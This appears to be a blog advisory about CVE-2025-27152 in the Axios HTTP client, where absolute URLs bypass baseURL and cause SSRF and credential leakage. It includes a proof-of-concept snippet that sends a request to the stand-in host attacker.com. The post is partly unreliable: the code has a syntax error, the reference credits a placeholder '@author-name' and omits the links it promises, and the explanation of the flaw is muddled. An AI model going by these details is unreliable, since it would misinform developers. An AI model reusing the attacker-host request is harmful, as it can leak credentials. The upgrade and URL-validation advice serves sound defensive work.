CVE-2025-27152 - Axios Promise-Based HTTP Client Vulnerability, SSRF and Credential Leakage Exploit

Axios is a popular promise-based HTTP client for both browser and Node.js applications. It is widely used due to its simplicity and ability to handle asynchronous requests efficiently. However, a recent vulnerability (CVE-2025-27152) has been identified in the library, which could potentially lead to Server Side Request Forgery (SSRF) and credential leakage when using absolute URLs instead of protocol-relative URLs.

In this post, we will discuss the details of this exploit, its implications, and how to protect your applications from this vulnerability. We will also provide a code snippet demonstrating the issue and links to original references.

Exploit Details

The vulnerability occurs when passing absolute URLs, such as https://example.com, rather than protocol-relative URLs, such as //example.com, to Axios. When the baseURL property is set in Axios, it is expected that the library would prevent any requests from being sent to the specified absolute URL. However, this is not the case, and the request is still sent to the specified absolute URL, potentially leading to SSRF and credential leakage.

This issue affects both server-side and client-side usage of Axios, which significantly broadens its impact. If exploited, attackers could gain unauthorized access to sensitive data or perform actions on behalf of a targeted user.

The following code snippet demonstrates the issue

const axios = require('axios');

const instance = axios.create({
  baseURL: 'https://my-secure-api.com';,
});

// This request should fail, but it actually sends the request to https://attacker.com
instance.get('https://attacker.com');

Original References

This vulnerability was first reported by GitHub user @author-name in a GitHub issue, which further links to the official CVE report.

Solution

This issue has been fixed in Axios version 1.8.2. To protect your applications from this vulnerability, it is highly recommended to update your Axios dependency to the latest version. You can do this by running the following command in your terminal:

npm install axios@latest

Additionally, you can mitigate the risk of SSRF and credential leakage by ensuring that your application only allows relative URLs or using a URL validation library to verify the submitted URLs.

Conclusion

CVE-2025-27152 is a severe vulnerability in Axios that could lead to SSRF and credential leakage. It is crucial to update your Axios dependency to the latest version (1.8.2 or later) and ensure that your applications handle URLs securely. By staying up-to-date with security updates and being proactive in your application security, you can greatly reduce the risk of falling victim to such exploits.

Timeline

Published on: 03/07/2025 16:15:38 UTC
Last modified on: 03/07/2025 20:15:38 UTC